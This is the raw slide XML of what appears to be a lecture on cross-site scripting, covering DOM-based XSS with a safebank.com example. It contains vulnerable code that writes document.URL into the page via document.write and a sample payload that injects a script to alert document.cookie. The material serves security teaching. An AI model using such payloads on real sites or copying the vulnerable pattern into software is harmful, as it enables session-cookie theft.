              <a:rPr kumimoji="0" lang="fr-FR" altLang="en-PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="fr-FR" altLang="en-PK" sz="16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rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>function injects this into the DOM: </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&lt;select&gt; </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      &lt;OPTION value=1&gt;&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>)&lt;/script&gt;&lt;/OPTION&gt;</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      &lt;OPTION value=2&gt;CET&lt;/OPTION&gt;</a:t>
            </a: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&lt;/select&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK"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rPr>
              <a:t>The browser executes the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>tag and runs </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK" sz="1600" b="1"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PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-PK" sz="1600" b="1"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lang="en-US" sz="1600" dirty="0"/>
              <a:t>This alerts the user's cookies, exposing sensitive information such as session tokens.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK"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3122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617812"/>
            <a:ext cx="10598573" cy="3207780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Suppose</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>safebank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>uses client</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>side</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>display</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>friendly </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-700" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>welcome</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-67" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>For</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>example,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>following code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>shows </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Joe”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2833"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://safebank.com/welcome.php?name=Joe</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="2667" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1032908">
              <a:spcBef>
                <a:spcPts val="1560"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Hello</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1032908"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572680" y="450262"/>
            <a:ext cx="7044267" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-73" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>0:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Dom</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Based</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-33" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1747520" y="4785614"/>
          <a:ext cx="8761306" cy="1103374"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1133687">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4547447">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3080172">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="371855">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="2075"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>var</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-25" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>pos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>document.URL.indexOf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="818181"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>"name="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>)+</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5"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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365760">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="2039"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>document.write</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>document.URL.substring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>pos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>document.URL.length</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10"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65759">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="2039"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>&lt;/script&gt;</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnR w="53975">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="2300">
                        <a:latin typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="53975">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8331200" cy="492760"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6248400" cy="369570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>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7" name="object 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8" name="object 8"/>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33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-87" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 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10" name="object 1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1" name="object 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11468676" y="6495252"/>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617813"/>
            <a:ext cx="9740053" cy="1791943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
